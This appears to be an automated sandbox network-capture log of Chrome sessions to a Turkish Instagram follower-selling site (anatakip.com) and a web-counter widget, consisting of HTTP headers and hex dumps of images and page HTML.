                    2024-05-26 22:58:33 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 dc 50 4c 54 45 ff ff ff d2 d2 d2 c1 c1 c1 d4 d4 d4 8b 8b 8b c6 c6 c6 ac ac ac e3 e3 e3 c8 c8 c8 bc bc bc bb bb bb e7 e7 e7 b9 b9 b9 88 88 88 b7 b7 b7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88
                    Data Ascii: PNGIHDRQpPLTEtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,
                    2024-05-26 22:58:33 UTC758INData Raw: 9c 1f 2a fa 0a b3 03 7d d6 62 cf 0b 9d 0e 2f 46 ad 56 63 01 b3 f3 dc df 89 73 3e 2f 58 8b 76 db 04 9a 6a 2d a6 3e fc f6 4f c5 fe cb 8a ff 3f af 15 a3 a9 36 23 71 f3 9b 7f 10 3f ff 7a 0f ab c6 25 39 d9 59 c6 95 72 4c ac 99 8e cd ce ce 3e 46 1d 9a e4 e1 50 15 46 8e 2a bf df 7f e5 5d 7f 51 5f f8 fd b4 5d f3 ba 5f c6 67 02 64 f8 57 c8 00 9e b6 28 80 cc c8 a3 21 52 1d 1e c6 7a f7 04 46 65 16 a7 d7 fb fd df d4 93 4f 7f 79 3f 0b cf 6f f5 52 36 9d 2e 1d 4e f3 ae a0 4b 64 2d 51 67 23 f5 28 a0 95 b4 74 f9 b2 65 8a 7c c6 a9 5a 71 db 3c f5 83 28 8a af b1 34 7f ab 48 69 75 56 11 b4 e2 72 5a 48 10 35 56 51 d4 45 d0 53 02 39 89 62 04 ab 94 89 7c c6 be b6 4e df c1 69 e2 06 df 47 3e 9f 1c a7 3f f6 a9 e0 54 df 72 27 9e 40 86 29 ea 85 85 c6 14 5a 64 3c 8f 91 50 2b 0c 3c 3c
                    Data Ascii: *}b/FVcs>/Xvj->O?6#q?z%9YrL>FPF*]Q_]_gdW(!RzFeOy?oR6.NKd-Qg#(te|Zq<(4HiuVrZH5VQES9b|NiG>?Tr'@)Zd<P+<<


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    83192.168.2.549863104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:33 UTC357OUTGET /classic/00/55.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:34 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:34 GMT
                    Content-Type: image/png
                    Content-Length: 1398
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-576"
                    expires: Wed, 15 May 2024 17:21:41 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1057012
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15ee2a9d98ce6-EWR
                    2024-05-26 22:58:34 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 9a 50 4c 54 45 ff ff ff 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53 19 1b 32 1f 20 9a 27 2b 57 3d 3e 33 33 33 66 4e 4f 39 25 26 6b 4b 4c 4e 46 46 92 55 58 20 20 20 c1 45 4a b7 55 59 a4 27 2c 24
                    Data Ascii: PNGIHDRQpPLTErrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S2 '+W=>333fNO9%&kKLNFFUX EJUY',$
                    2024-05-26 22:58:34 UTC461INData Raw: 1f 8b 2f 70 52 a1 c4 60 b5 5a 3d 48 54 38 85 75 10 c4 98 9c 5e ef bb bf bc 83 87 5f 6c 13 e2 f8 24 af 44 08 11 22 2b 9c 2c 07 7a 46 47 32 33 b7 99 f7 9e 61 98 f3 42 35 af 61 24 82 89 60 59 e1 8c 43 cf 58 92 93 cf 7e ae 47 96 b3 f7 59 d6 9f f5 0f 58 89 20 62 e0 80 fe 41 e2 c2 b1 58 20 a0 93 e9 b2 5d 8d 48 5a 6a 1a 4d 2f dc bb 84 ef c6 54 5a 2c 86 e0 f5 13 15 86 b5 ec 08 04 6c b5 ad ec 55 03 52 1a 5f aa 29 6d 88 d7 4c e3 6f 8e 61 b6 82 be 7d 88 de d2 12 b3 b0 b6 4a 08 0a ed a4 ae 89 77 66 a5 d3 b9 b5 a9 e9 d4 3a fe 66 be 13 a7 57 4f 79 fd a7 a2 38 33 b1 1a 02 66 0f 49 6a 05 3f 48 f2 4b 95 3f b5 fb 48 1c 95 4a 5e 62 19 cf 21 a8 b0 91 e4 d9 b6 89 3b 57 b4 8f dc 8d fb ba 91 e8 21 2b 89 28 03 04 de 70 b7 7b 8c 7f 8c 7b 56 d5 89 2d 42 2d 75 e3 a8 08 a3 ac 24 52
                    Data Ascii: /pR`Z=HT8u^_l$D"+,zFG23aB5a$`YCX~GYX bAX ]HZjM/TZ,lUR_)mLoa}Jwf:fWOy83fIj?HK?HJ^b!;W!+(p{{V-B-u$R


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    84192.168.2.54986435.190.80.14433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:34 UTC531OUTOPTIONS /report/v4?s=l9Q2NhKNcmiYuawVkY6%2FFZHGWCkucLEvghjiYGr2K4LS7VB500g%2BPV379t7kj5WUbcYjeBh%2F4F7R3lnu9nfXimYuu4rldEgbjiqW4eUgvo%2FJj3E3uMakhtru3ioehm8%3D HTTP/1.1
                    Host: a.nel.cloudflare.com
                    Connection: keep-alive
                    Origin: https://anatakip.com
                    Access-Control-Request-Method: POST
                    Access-Control-Request-Headers: content-type
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:34 UTC336INHTTP/1.1 200 OK
                    content-length: 0
                    access-control-max-age: 86400
                    access-control-allow-methods: POST, OPTIONS
                    access-control-allow-origin: *
                    access-control-allow-headers: content-length, content-type
                    date: Sun, 26 May 2024 22:58:34 GMT
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    85192.168.2.549866104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:34 UTC914OUTGET /tools/send-follower HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    Referer: https://anatakip.com/tools
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764311.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:34 UTC738INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9%2B3rEY2gST3x1GSuXb%2FyQwBWbbme9PkgticWRaCIcKnamMK%2BtFdRzN%2BS3Cg%2Ft23xnlDnLZVdmiz6YRUSh2OXqnk5X7NfWguAhZYxwAfTa4yUVST7PTRpdRQDXTK9yA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15ee54e4741cf-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:34 UTC631INData Raw: 31 63 36 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c6f<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:34 UTC1369INData Raw: 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 47 69 72 69 c5 9f 20 59 61 70 6d 61 6e c4 b1 7a 20 47 65 72 65 6b 69 79 6f 72 21 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e
                    Data Ascii: yle/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Giri Yapmanz Gerekiyor! | AnaTakip kendinizi instagram en iyi profili halin
                    2024-05-26 22:58:34 UTC1369INData Raw: 22 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63
                    Data Ascii: ".navbar-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul c
                    2024-05-26 22:58:34 UTC1369INData Raw: 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22
                    Data Ascii: Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="col-md-3"
                    2024-05-26 22:58:34 UTC1369INData Raw: 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d 2e 6c 20 3d 20 31 20 2a 20 6e 65
                    Data Ascii: src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r].l = 1 * ne
                    2024-05-26 22:58:34 UTC1180INData Raw: 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 0a 09 09 09
                    Data Ascii: aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overflow-y: auto;
                    2024-05-26 22:58:34 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    86192.168.2.549865104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:34 UTC839OUTGET /packages HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764311.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:35 UTC744INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZESxi5Ro4HfyC3tk6GgvfCplFULFQ5p%2BP2B5ZGvVCyTZjF%2FpkqrhShXdeK3F%2BDlY%2BzXBJ3kaSe3KYR7k%2FDfi%2F579RAUGpyJyiShYa11gLPw%2FnGbb%2F9rN4q9L9T53bYk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15ee7bedb0f41-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:35 UTC625INData Raw: 34 35 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 4597<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:35 UTC1369INData Raw: 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 49 6e 73 74 61 67 72 61 6d 20 54 61 6b 69 70 c3 a7 69 2c 20 42 65 c4 9f 65 6e 69 20 76 65 20 4f 74 6f 20 42 65 c4 9f 65 6e 69 20 50 61 6b 65 74 6c 65 72 69 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69
                    Data Ascii: ets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Instagram Takipi, Beeni ve Oto Beeni Paketleri | AnaTakip kendinizi
                    2024-05-26 22:58:35 UTC1369INData Raw: 65 74 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2e 70 6e 67 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 20 70 75 6c 6c 2d 72 69 67 68 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61 76 62 61 72 2d 6e 61 76 20 70 75 6c 6c 2d 6c 65 66 74 22 3e 0a 3c 6c 69 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 74 6e 22 3e 0a 3c 61 20 69 64 3d 22 6c 6f 67 69 6e 41 73 55 73 65 72 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 69 67 6e 2d 69 6e 22 3e 3c 2f 69 3e 0a 47 c4 b0 52 c4 b0 c5 9e 0a 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 2f 6c 69 3e 0a 3c 2f
                    Data Ascii: ets/logo/logo.png" /></a></div><div class="navbar-header pull-right"><ul class="nav navbar-nav pull-left"><li><p class="navbar-btn"><a id="loginAsUser" class="btn btn-primary" href="/login"><i class="fa fa-sign-in"></i>GR</a></p></li></
                    2024-05-26 22:58:35 UTC1369INData Raw: 20 69 6e 73 61 6e 6c 61 72 c4 b1 6e 20 68 6f c5 9f 75 6e 61 20 67 69 64 65 63 65 6b 20 70 61 79 6c 61 c5 9f c4 b1 6d 6c 61 72 20 79 61 70 61 6e 20 73 61 79 66 61 6c 61 72 c4 b1 6e c4 b1 7a 61 20 74 61 6b 69 70 c3 a7 69 20 c3 a7 65 6b 6d 65 6b 74 69 72 2e 3c 62 72 2f 3e 0a 3c 73 74 72 6f 6e 67 3e c4 b0 6c 65 74 69 c5 9f 69 6d 2f 57 68 61 74 73 61 70 70 3a 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 2f 73 65 6e 64 3f 70 68 6f 6e 65 3d 39 30 35 34 34 39 36 31 32 30 35 32 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 30 20 28 35 34 34 29 20 39 36 31 26 6e 62 73 70 3b 32 30 26 6e 62 73 70 3b 35 32 3c 2f 61 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73
                    Data Ascii: insanlarn houna gidecek paylamlar yapan sayfalarnza takipi ekmektir.<br/><strong>letiim/Whatsapp:&nbsp;<a href="https://api.whatsapp.com/send?phone=905449612052" target="_blank">0 (544) 961&nbsp;20&nbsp;52</a></strong></p><div class
                    2024-05-26 22:58:35 UTC1369INData Raw: 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 34 73 20 65 61 73 65 20 30 73 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 20 31 70 78 20 31 70 78 20 34 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 32 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 35 30 25 20 63 65 6e 74 65 72 3b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72
